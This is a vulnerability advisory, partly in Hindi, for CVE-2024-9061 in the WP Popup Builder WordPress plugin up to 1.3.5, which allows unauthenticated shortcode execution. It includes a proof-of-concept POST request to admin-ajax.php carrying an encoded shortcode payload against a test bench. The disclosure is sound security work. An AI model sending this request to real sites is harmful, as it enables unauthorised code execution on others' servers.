
WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन <= 1.3.5 - बिना प्रमाणीकरण के मनमाना शॉर्टकोड निष्पादन wp_ajax_nopriv_shortcode_Api_Add के माध्यम से
WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन <= 1.3.5 - अनधिकृत मनमाना शॉर्टकोड निष्पादन wp_ajax_nopriv_shortcode_Api_Add के माध्यम से
The WP Popup Builder – पॉपअप फॉर्म और मार्केटिंग लीड जनरेशन प्लगइन वर्डप्रेस के लिए सभी संस्करणों में, 1.3.5 तक और इसमें शामिल, wp_ajax_nopriv_shortcode_Api_Add AJAX क्रिया के माध्यम से मनमाना शॉर्टकोड निष्पादन के लिए असुरक्षित है। यह सॉफ्टवेयर द्वारा उपयोगकर्ताओं को एक ऐसी क्रिया निष्पादित करने की अनुमति देने के कारण है जो do_shortcode चलाने से पहले किसी मान को ठीक से मान्य नहीं करती है। इससे अनधिकृत हमलावरों के लिए मनमाने शॉर्टकोड निष्पादित करना संभव हो जाता है। नोट: इस कमजोरी को आंशिक रूप से संस्करण 1.3.5 में एक नॉन्स जांच के साथ ठीक किया गया था, जिसने प्रभावित फ़ंक्शन तक पहुंच को प्रभावी ढंग से रोक दिया। हालांकि, संस्करण 1.3.6 अनधिकृत पहुंच को रोकने के लिए सही प्राधिकरण जांच शामिल करता है।
मेरे पास इसके लिए PHP निष्पादन के लिए एक और प्लगइन स्थापित था लेकिन इसे कभी निष्पादित नहीं करवा पाया।
[xyz-ips snippet="test"]
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
प्रतिक्रिया एक खाली 200 है